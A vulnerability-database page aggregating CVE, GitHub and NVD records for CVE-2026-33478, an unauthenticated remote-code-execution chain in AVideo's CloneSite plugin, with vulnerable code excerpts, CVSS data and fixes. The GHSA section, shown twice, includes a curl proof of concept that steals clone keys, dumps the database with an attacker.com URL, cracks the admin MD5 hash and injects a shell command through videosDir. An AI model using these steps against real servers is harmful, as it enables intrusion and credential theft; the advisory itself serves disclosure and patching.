Vulnerability-Lookup

CVE-2026-33478 (GCVE-0-2026-33478)

Vulnerability from cvelistv5 – Published: 2026-03-23 14:01 – Updated: 2026-03-23 21:40

Title

AVideo Multi-Chain Attack: Unauthenticated Remote Code Execution via Clone Key Disclosure, Database Dump, and Command Injection

Summary

WWBN AVideo is an open source video platform. In versions up to and including 26.0, multiple vulnerabilities in AVideo's CloneSite plugin chain together to allow a completely unauthenticated attacker to achieve remote code execution. The `clones.json.php` endpoint exposes clone secret keys without authentication, which can be used to trigger a full database dump via `cloneServer.json.php`. The dump contains admin password hashes stored as MD5, which are trivially crackable. With admin access, the attacker exploits an OS command injection in the rsync command construction in `cloneClient.json.php` to execute arbitrary system commands. Commit c85d076375fab095a14170df7ddb27058134d38c contains a patch.

Severity ?

10 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CWE-284 - Improper Access Control

Assigner

GitHub_M

References

URL

Tags

	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
	https://github.com/WWBN/AVideo/commit/c85d076375f…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: <= 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33478",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-23T21:36:16.759404Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-23T21:40:58.174Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, multiple vulnerabilities in AVideo\u0027s CloneSite plugin chain together to allow a completely unauthenticated attacker to achieve remote code execution. The `clones.json.php` endpoint exposes clone secret keys without authentication, which can be used to trigger a full database dump via `cloneServer.json.php`. The dump contains admin password hashes stored as MD5, which are trivially crackable. With admin access, the attacker exploits an OS command injection in the rsync command construction in `cloneClient.json.php` to execute arbitrary system commands. Commit c85d076375fab095a14170df7ddb27058134d38c contains a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-284",
              "description": "CWE-284: Improper Access Control",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-23T14:01:19.611Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/c85d076375fab095a14170df7ddb27058134d38c",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/c85d076375fab095a14170df7ddb27058134d38c"
        }
      ],
      "source": {
        "advisory": "GHSA-687q-32c6-8x68",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo Multi-Chain Attack: Unauthenticated Remote Code Execution via Clone Key Disclosure, Database Dump, and Command Injection"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33478",
    "datePublished": "2026-03-23T14:01:19.611Z",
    "dateReserved": "2026-03-20T16:16:48.970Z",
    "dateUpdated": "2026-03-23T21:40:58.174Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33478",
      "date": "2026-04-23",
      "epss": "0.11137",
      "percentile": "0.93513"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33478\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-23T15:16:34.063\",\"lastModified\":\"2026-03-24T18:51:55.653\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions up to and including 26.0, multiple vulnerabilities in AVideo\u0027s CloneSite plugin chain together to allow a completely unauthenticated attacker to achieve remote code execution. The `clones.json.php` endpoint exposes clone secret keys without authentication, which can be used to trigger a full database dump via `cloneServer.json.php`. The dump contains admin password hashes stored as MD5, which are trivially crackable. With admin access, the attacker exploits an OS command injection in the rsync command construction in `cloneClient.json.php` to execute arbitrary system commands. Commit c85d076375fab095a14170df7ddb27058134d38c contains a patch.\"},{\"lang\":\"es\",\"value\":\"WWBN AVideo es una plataforma de video de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, m\u00faltiples vulnerabilidades en el plugin CloneSite de AVideo se encadenan para permitir a un atacante completamente no autenticado lograr la ejecuci\u00f3n remota de c\u00f3digo. El endpoint \u0027clones.json.php\u0027 expone claves secretas de clonaci\u00f3n sin autenticaci\u00f3n, lo que puede usarse para desencadenar un volcado completo de la base de datos a trav\u00e9s de \u0027cloneServer.json.php\u0027. El volcado contiene hashes de contrase\u00f1as de administrador almacenados como MD5, que son trivialmente descifrables. Con acceso de administrador, el atacante explota una inyecci\u00f3n de comandos del sistema operativo en la construcci\u00f3n del comando rsync en \u0027cloneClient.json.php\u0027 para ejecutar comandos de sistema arbitrarios. El commit c85d076375fab095a14170df7ddb27058134d38c contiene un parche.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":10.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"},{\"lang\":\"en\",\"value\":\"CWE-284\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"26.0\",\"matchCriteriaId\":\"774C24F1-9D26-484F-B931-1DA107C8F588\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/c85d076375fab095a14170df7ddb27058134d38c\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33478\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-23T21:36:16.759404Z\"}}}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-23T21:36:27.359Z\"}}], \"cna\": {\"title\": \"AVideo Multi-Chain Attack: Unauthenticated Remote Code Execution via Clone Key Disclosure, Database Dump, and Command Injection\", \"source\": {\"advisory\": \"GHSA-687q-32c6-8x68\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 10, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/c85d076375fab095a14170df7ddb27058134d38c\", \"name\": \"https://github.com/WWBN/AVideo/commit/c85d076375fab095a14170df7ddb27058134d38c\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions up to and including 26.0, multiple vulnerabilities in AVideo\u0027s CloneSite plugin chain together to allow a completely unauthenticated attacker to achieve remote code execution. The `clones.json.php` endpoint exposes clone secret keys without authentication, which can be used to trigger a full database dump via `cloneServer.json.php`. The dump contains admin password hashes stored as MD5, which are trivially crackable. With admin access, the attacker exploits an OS command injection in the rsync command construction in `cloneClient.json.php` to execute arbitrary system commands. Commit c85d076375fab095a14170df7ddb27058134d38c contains a patch.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-284\", \"description\": \"CWE-284: Improper Access Control\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-23T14:01:19.611Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33478\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-23T21:40:58.174Z\", \"dateReserved\": \"2026-03-20T16:16:48.970Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-23T14:01:19.611Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-687Q-32C6-8X68

Vulnerability from github – Published: 2026-03-20 20:43 – Updated: 2026-04-08 22:49

Summary

AVideo Multi-Chain Attack: Unauthenticated Remote Code Execution via Clone Key Disclosure, Database Dump, and Command Injection

Details

Summary

Multiple vulnerabilities in AVideo's CloneSite plugin chain together to allow a completely unauthenticated attacker to achieve remote code execution. The clones.json.php endpoint exposes clone secret keys without authentication, which can be used to trigger a full database dump via cloneServer.json.php. The dump contains admin password hashes stored as MD5, which are trivially crackable. With admin access, the attacker exploits an OS command injection in the rsync command construction in cloneClient.json.php to execute arbitrary system commands.

Details

Step 1: Clone Key Disclosure

plugin/CloneSite/clones.json.php:1-8 has zero authentication:

<?php
require_once '../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/CloneSite/Objects/Clones.php';
header('Content-Type: application/json');
$rows = Clones::getAll();
?>
{"data": <?php echo json_encode($rows); ?>}

The response includes the key field for every registered clone, which is the sole authentication credential for clone operations.

Step 2: Database Dump via Stolen Key

plugin/CloneSite/cloneServer.json.php:73-97 — once the key passes Clones::thisURLCanCloneMe(), the server executes mysqldump and writes the result to a web-accessible directory:

$cmd = "mysqldump -u {$mysqlUser} -p'{$mysqlPass}' --host {$mysqlHost} "
    ." --default-character-set=utf8mb4 {$mysqlDatabase} {$tablesList} > $sqlFile";
exec($cmd . " 2>&1", $output, $return_val);

The SQL file path is returned in the JSON response and is downloadable.

Step 3: Admin Credential Extraction

objects/user.php:1798 — passwords are stored as unsalted MD5:

$passEncoded = md5($pass);

The users table in the dump contains user, password (MD5), and isAdmin fields. MD5 hashes crack in seconds.

Step 4: Command Injection via Rsync

plugin/CloneSite/cloneClient.json.php:259 — the videosDir from the clone server response is interpolated unsanitized into the rsync command:

$rsync = "sshpass -p '{password}' rsync -av ... {$objClone->cloneSiteSSHUser}@{$objClone->cloneSiteSSHIP}:{$json->videosDir} ...";
exec($cmd . " 2>&1", $output, $return_val);

An admin who controls a clone server (or an attacker who has become admin) can inject arbitrary commands via the videosDir field.

PoC

# Step 1: Steal clone keys (unauthenticated)
curl -s 'http://target/plugin/CloneSite/clones.json.php' | jq '.data[0].key'
# Output: "a1b2c3d4e5f6..."

# Step 2: Trigger database dump
CLONE_KEY="a1b2c3d4e5f6..."
curl -s "http://target/plugin/CloneSite/cloneServer.json.php" \
  --data "url=http://attacker.com&key=${CLONE_KEY}&useRsync=0" | jq '.sqlFile'
# Output: "Clone_mysqlDump_1234567890.sql"

# Step 3: Download the dump and extract admin credentials
curl -s "http://target/videos/clones/Clone_mysqlDump_1234567890.sql" \
  | grep -A2 "INSERT INTO.*users" \
  | grep -oP "admin','[a-f0-9]{32}"
# Output: admin','5f4dcc3b5aa765d61d8327deb882cf99  (MD5 of "password")

# Step 4: Crack MD5 (trivial)
echo -n "5f4dcc3b5aa765d61d8327deb882cf99" | hashcat -m 0 -a 0 rockyou.txt
# Output: password

# Step 5: Login as admin, configure CloneSite with malicious server
# The attacker's clone server returns videosDir containing: /tmp$(id > /tmp/pwned)
# When rsync executes, the $(id) is evaluated by the shell

Impact

Complete server compromise: Unauthenticated attacker achieves arbitrary command execution as the web server user
Full database disclosure: The entire database (users, videos, configurations, secrets) is exfiltrated
No user interaction: Every step is automated, no clicks or social engineering required
Credential theft: All user passwords (MD5) are trivially recoverable
Lateral movement: Database credentials and SSH credentials (stored encrypted in the plugins table) may enable access to other systems

Recommended Fix

Add authentication to clones.json.php:

// plugin/CloneSite/clones.json.php
require_once '../../videos/configuration.php';
if (!User::isAdmin()) {
    http_response_code(403);
    die(json_encode(['error' => true, 'msg' => 'Admin required']));
}

Don't store SQL dumps in web-accessible directories — use a path outside the web root or require re-authentication to download.
Upgrade password hashing — replace MD5 with password_hash() (bcrypt/argon2):

// Replace: $passEncoded = md5($pass);
$passEncoded = password_hash($pass, PASSWORD_DEFAULT);

Sanitize rsync command parameters — use escapeshellarg() on all interpolated values:

$rsync = sprintf("rsync -av ... %s@%s:%s ...",
    escapeshellarg($objClone->cloneSiteSSHUser),
    escapeshellarg($objClone->cloneSiteSSHIP),
    escapeshellarg($json->videosDir)
);

Severity ?

10.0 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33478"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T20:43:50Z",
    "nvd_published_at": "2026-03-23T15:16:34Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nMultiple vulnerabilities in AVideo\u0027s CloneSite plugin chain together to allow a completely unauthenticated attacker to achieve remote code execution. The `clones.json.php` endpoint exposes clone secret keys without authentication, which can be used to trigger a full database dump via `cloneServer.json.php`. The dump contains admin password hashes stored as MD5, which are trivially crackable. With admin access, the attacker exploits an OS command injection in the rsync command construction in `cloneClient.json.php` to execute arbitrary system commands.\n\n## Details\n\n### Step 1: Clone Key Disclosure\n\n`plugin/CloneSite/clones.json.php:1-8` has zero authentication:\n\n```php\n\u003c?php\nrequire_once \u0027../../videos/configuration.php\u0027;\nrequire_once $global[\u0027systemRootPath\u0027] . \u0027plugin/CloneSite/Objects/Clones.php\u0027;\nheader(\u0027Content-Type: application/json\u0027);\n$rows = Clones::getAll();\n?\u003e\n{\"data\": \u003c?php echo json_encode($rows); ?\u003e}\n```\n\nThe response includes the `key` field for every registered clone, which is the sole authentication credential for clone operations.\n\n### Step 2: Database Dump via Stolen Key\n\n`plugin/CloneSite/cloneServer.json.php:73-97` \u2014 once the key passes `Clones::thisURLCanCloneMe()`, the server executes `mysqldump` and writes the result to a web-accessible directory:\n\n```php\n$cmd = \"mysqldump -u {$mysqlUser} -p\u0027{$mysqlPass}\u0027 --host {$mysqlHost} \"\n    .\" --default-character-set=utf8mb4 {$mysqlDatabase} {$tablesList} \u003e $sqlFile\";\nexec($cmd . \" 2\u003e\u00261\", $output, $return_val);\n```\n\nThe SQL file path is returned in the JSON response and is downloadable.\n\n### Step 3: Admin Credential Extraction\n\n`objects/user.php:1798` \u2014 passwords are stored as unsalted MD5:\n\n```php\n$passEncoded = md5($pass);\n```\n\nThe `users` table in the dump contains `user`, `password` (MD5), and `isAdmin` fields. MD5 hashes crack in seconds.\n\n### Step 4: Command Injection via Rsync\n\n`plugin/CloneSite/cloneClient.json.php:259` \u2014 the `videosDir` from the clone server response is interpolated unsanitized into the rsync command:\n\n```php\n$rsync = \"sshpass -p \u0027{password}\u0027 rsync -av ... {$objClone-\u003ecloneSiteSSHUser}@{$objClone-\u003ecloneSiteSSHIP}:{$json-\u003evideosDir} ...\";\nexec($cmd . \" 2\u003e\u00261\", $output, $return_val);\n```\n\nAn admin who controls a clone server (or an attacker who has become admin) can inject arbitrary commands via the `videosDir` field.\n\n## PoC\n\n```bash\n# Step 1: Steal clone keys (unauthenticated)\ncurl -s \u0027http://target/plugin/CloneSite/clones.json.php\u0027 | jq \u0027.data[0].key\u0027\n# Output: \"a1b2c3d4e5f6...\"\n\n# Step 2: Trigger database dump\nCLONE_KEY=\"a1b2c3d4e5f6...\"\ncurl -s \"http://target/plugin/CloneSite/cloneServer.json.php\" \\\n  --data \"url=http://attacker.com\u0026key=${CLONE_KEY}\u0026useRsync=0\" | jq \u0027.sqlFile\u0027\n# Output: \"Clone_mysqlDump_1234567890.sql\"\n\n# Step 3: Download the dump and extract admin credentials\ncurl -s \"http://target/videos/clones/Clone_mysqlDump_1234567890.sql\" \\\n  | grep -A2 \"INSERT INTO.*users\" \\\n  | grep -oP \"admin\u0027,\u0027[a-f0-9]{32}\"\n# Output: admin\u0027,\u00275f4dcc3b5aa765d61d8327deb882cf99  (MD5 of \"password\")\n\n# Step 4: Crack MD5 (trivial)\necho -n \"5f4dcc3b5aa765d61d8327deb882cf99\" | hashcat -m 0 -a 0 rockyou.txt\n# Output: password\n\n# Step 5: Login as admin, configure CloneSite with malicious server\n# The attacker\u0027s clone server returns videosDir containing: /tmp$(id \u003e /tmp/pwned)\n# When rsync executes, the $(id) is evaluated by the shell\n```\n\n## Impact\n\n- **Complete server compromise**: Unauthenticated attacker achieves arbitrary command execution as the web server user\n- **Full database disclosure**: The entire database (users, videos, configurations, secrets) is exfiltrated\n- **No user interaction**: Every step is automated, no clicks or social engineering required\n- **Credential theft**: All user passwords (MD5) are trivially recoverable\n- **Lateral movement**: Database credentials and SSH credentials (stored encrypted in the plugins table) may enable access to other systems\n\n## Recommended Fix\n\n1. **Add authentication to `clones.json.php`:**\n```php\n// plugin/CloneSite/clones.json.php\nrequire_once \u0027../../videos/configuration.php\u0027;\nif (!User::isAdmin()) {\n    http_response_code(403);\n    die(json_encode([\u0027error\u0027 =\u003e true, \u0027msg\u0027 =\u003e \u0027Admin required\u0027]));\n}\n```\n\n2. **Don\u0027t store SQL dumps in web-accessible directories** \u2014 use a path outside the web root or require re-authentication to download.\n\n3. **Upgrade password hashing** \u2014 replace MD5 with `password_hash()` (bcrypt/argon2):\n```php\n// Replace: $passEncoded = md5($pass);\n$passEncoded = password_hash($pass, PASSWORD_DEFAULT);\n```\n\n4. **Sanitize rsync command parameters** \u2014 use `escapeshellarg()` on all interpolated values:\n```php\n$rsync = sprintf(\"rsync -av ... %s@%s:%s ...\",\n    escapeshellarg($objClone-\u003ecloneSiteSSHUser),\n    escapeshellarg($objClone-\u003ecloneSiteSSHIP),\n    escapeshellarg($json-\u003evideosDir)\n);\n```",
  "id": "GHSA-687q-32c6-8x68",
  "modified": "2026-04-08T22:49:56Z",
  "published": "2026-03-20T20:43:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33478"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/c85d076375fab095a14170df7ddb27058134d38c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo Multi-Chain Attack: Unauthenticated Remote Code Execution via Clone Key Disclosure, Database Dump, and Command Injection"
}

FKIE_CVE-2026-33478

Vulnerability from fkie_nvd - Published: 2026-03-23 15:16 - Updated: 2026-03-24 18:51

Severity ?

10.0 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/WWBN/AVideo/commit/c85d076375fab095a14170df7ddb27058134d38c	Patch
security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68	Exploit, Mitigation, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588",
              "versionEndIncluding": "26.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, multiple vulnerabilities in AVideo\u0027s CloneSite plugin chain together to allow a completely unauthenticated attacker to achieve remote code execution. The `clones.json.php` endpoint exposes clone secret keys without authentication, which can be used to trigger a full database dump via `cloneServer.json.php`. The dump contains admin password hashes stored as MD5, which are trivially crackable. With admin access, the attacker exploits an OS command injection in the rsync command construction in `cloneClient.json.php` to execute arbitrary system commands. Commit c85d076375fab095a14170df7ddb27058134d38c contains a patch."
    },
    {
      "lang": "es",
      "value": "WWBN AVideo es una plataforma de video de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, m\u00faltiples vulnerabilidades en el plugin CloneSite de AVideo se encadenan para permitir a un atacante completamente no autenticado lograr la ejecuci\u00f3n remota de c\u00f3digo. El endpoint \u0027clones.json.php\u0027 expone claves secretas de clonaci\u00f3n sin autenticaci\u00f3n, lo que puede usarse para desencadenar un volcado completo de la base de datos a trav\u00e9s de \u0027cloneServer.json.php\u0027. El volcado contiene hashes de contrase\u00f1as de administrador almacenados como MD5, que son trivialmente descifrables. Con acceso de administrador, el atacante explota una inyecci\u00f3n de comandos del sistema operativo en la construcci\u00f3n del comando rsync en \u0027cloneClient.json.php\u0027 para ejecutar comandos de sistema arbitrarios. El commit c85d076375fab095a14170df7ddb27058134d38c contiene un parche."
    }
  ],
  "id": "CVE-2026-33478",
  "lastModified": "2026-03-24T18:51:55.653",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 10.0,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-23T15:16:34.063",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/c85d076375fab095a14170df7ddb27058134d38c"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        },
        {
          "lang": "en",
          "value": "CWE-284"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33478 (GCVE-0-2026-33478)

GHSA-687Q-32C6-8X68

Summary

Details

Step 1: Clone Key Disclosure

Step 2: Database Dump via Stolen Key

Step 3: Admin Credential Extraction

Step 4: Command Injection via Rsync

PoC

Impact

Recommended Fix

FKIE_CVE-2026-33478

Tags

Sightings

Nomenclature